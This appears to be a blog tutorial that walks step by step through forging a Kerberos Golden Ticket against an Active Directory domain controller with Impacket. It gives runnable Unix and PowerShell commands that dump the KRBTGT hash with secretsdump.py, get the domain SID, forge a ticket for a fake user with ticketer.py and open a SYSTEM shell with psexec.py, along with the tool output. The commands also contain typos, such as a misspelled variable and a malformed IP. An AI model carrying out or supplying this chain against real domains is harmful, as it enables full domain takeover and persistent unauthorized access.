I wanted to know how to create a Golden Ticket and in my pursuit to find an answer I came across many ways to do this. I found most techniques used several tools and took more work than I'd prefer. After all I am a developer for a reason, I'm lazy! Here I will attempt to show how I do it the easy way using Impacket.

Prerequisite

  • Impacket
  • Windows Active Directory Domain Dontroler

This attack takes advantage of some of the features in Active Directory. This being said an Active Directory Domain Controler is needed for this to work.

Impacket

Creating a Golden Ticket is made simple with the help of Impacket. Impacket is a suite of tools that any hacker should familiarize herself/himself with. The easiest way to get started with Impacket is to create a docker image. For more information on that check out my blog post impacket and docker.

For creating a Golden Ticket we are only concerned with the following tools.

  • secretsdump.py
  • lookupsid.py
  • ticketer.py
  • psexec.py

Create a Golden Ticket

To create a Golden Ticket the NT Hash for KRBTGT will need to be aquired as well as the Domain SID.
All this can easily be done with Impacket.

Set Environment Variables

To save time and confusion, set a few environment variables. We are going to use these throughout this tutorial. Below is an example change the values to your needs. To set the environment variable for Unix use export for Windows use $env:.

TARGET_IP="192.168.64.150"

USER="Administrator"

PASSWD="Password123" This is the USER password

DOMAIN="devserver.local"

Unix

An example for a Unix machine would be the following.

export TARGET_IP="192.168.1.64.150"

Windows

An example for a Windows machine would be the following.

$env:TARGET_IP="192.168.64.150"

Check environment variables.

Get-ChildItem Env:

KRBTGT NT Hash

Lets start off by getting the KRBTGT hash and seting it as an environment variable.

Unix

export NTHASH=$(secretsdump.py $USER:$PASSWD@$TARGET_IP | grep krbtgt | grep ::: | cut -d":" -f4)

Windows

$env:NTHASH=python .\secretsdump.py ${env:USER}:${env:PASSWD}@${env:TARGET_IP} | Select-String -Pat tern "krbtgt:" | Select-String -Pattern ":::" | Out-string | %{$_.split(":")[3]}

Domain SID

To get the domain SID use lookupsid.py and filter out just the information needed, setting it as an environment variable.

Unix

export DOMAIN_SID=$(lookupsid.py $USER:$PASSWD@$TARGET_IP | grep "Domain SID" | cut -d" " -f5)

Windows

$env:DOMAIN_SID=python .\lookupsid.py ${env:USER}:${env:PASSWD}@${env:TARGET_IP} | Select-Strin g -Pattern "Domain SID" | Out-String | %{$_.split(":")[1].replace(" ","")}

Create Ticket

With all the nessassary data create a ticket.

Unix

ticketer.py -nthash $NTHASH -domain-sid $DOMAIN_SID -domain $DOAMIN hacker

Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for devserver.local/hacker
[*]         PAC_LOGON_INFO
[*]         PAC_CLIENT_INFO_TYPE
[*]         EncTicketPart
[*]         EncAsRepPart
[*] Signing/Encrypting final ticket
[*]         PAC_SERVER_CHECKSUM
[*]         PAC_PRIVSVR_CHECKSUM
[*]         EncTicketPart
[*]         EncASRepPart
[*] Saving ticket in hacker.ccache

Windows

PS C:\impacket\examples> python .\ticketer.py -nthash ${env:NTHASH} -domain-sid ${env:DOMAIN_SID} -domain ${env:DOMAIN} hacker

Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for devserver.local/hacker
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in hacker.ccache

Set Ticket Environment Variable

To use the ticket with psexec.py the ticket needs to be set as an evironment variable.

Unix

export KRB5CCNAME=/vagrant/docs/baduser.ccache

Windows

$env:KRB5CCNAME="C:\impacket\examples\hacker.ccache"

Use the Ticket With Psexec

Below we use the ticket to authenticate hacker against devserver the name of the target maching.

psexec.py -dc-ip $TARGET_IP -target-ip $TARGET_IP -no-pass -k $DOMAIN/hacker@devserver.$DOAMIN

Windows

PS C:\impacket\examples> python .\psexec.py -dc-ip ${env:TARGET_IP} -target-ip ${env:Target_IP} -no-pass -k ${env:DOMAIN
}/hacker@devserver.${env:DOMAIN}
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 192.168.64.150.....
[*] Found writable share ADMIN$
[*] Uploading file IDpUjSuF.exe
[*] Opening SVCManager on 192.168.64.150.....
[*] Creating service Qauy on 192.168.64.150.....
[*] Starting service Qauy.....
[!] Press help for extra shell commands                                                                                M
icrosoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
Golden Ticket